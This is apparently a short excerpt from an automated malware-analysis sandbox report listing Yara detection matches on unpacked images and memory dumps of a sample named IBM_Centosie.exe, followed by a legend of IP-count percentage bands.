Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs